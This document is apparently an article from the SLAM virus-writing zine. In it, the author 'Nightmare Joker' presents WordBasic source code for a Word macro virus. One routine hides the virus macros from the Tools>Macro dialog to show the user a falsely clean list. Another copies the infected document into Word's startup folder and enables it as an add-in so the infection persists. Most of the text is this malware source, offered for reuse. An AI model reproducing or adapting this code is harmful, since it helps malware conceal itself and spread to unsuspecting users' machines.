Copy Link
Add to Bookmark
Report
SLAM2.028: A full-stealth Technique in Macro Viruses by NJ [SLAM]
FULL - STEALHT ROUTINE!
At first I want to say thankz to Virtual Boy for his great full-stealth routine. Yeah, right. I mean a full stealth routine, which hide all virus macros and the best the virus works, too. Forget now this really bad ToolsMacro Box from my MooNRaiDer virus and look at this fantastic code.
OK, here is the source code:
-------------------------------------------------------------
MACRO: ToolsMacro
~~~~~~~~~~~~~~~~~
Sub MAIN
REM Get the position of the infected document.
b = GetAddInId(DefaultDir$(8) + "\0.dot")
REM Set ScreenUpdating Off
ScreenUpdating 0
If DocMaximize() Then
DocMaximize
c = 1
EndIf
REM Create a new file to hide the virus macros in the active file.
FileNew
REM Remove now the virus document from the ToolsMacro box.
If b Then AddInState 1, 0
REM ToolsMacro Options
Dim d As ToolsMacro
On Error Resume Next
Dialog d
REM Close the document.
FileClose
REM Enable now again the virus document.
If c Then DocMaximize
If b Then AddInState 1, 1
REM Show the user the >> clean << Box. ;)
ToolsMacro d
End Sub
-------------------------------------------------------------
"Routine to infect normal.dot"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sub MAIN
REM a$ = Startup Path from WinWord.
a$ = DefaultDir$(8) + "\0.dot"
REM Copy the infected document to this Startup Path.
If Files$(a$) = "" Then
CopyFile FileName$(), a$
REM Enable the virus!
AddAddIn a$
EndIf
End Sub
-------------------------------------------------------------
This code is from Virtual Boys macro virus >> Zero << (AKA: TK).
- Nightmare Joker -
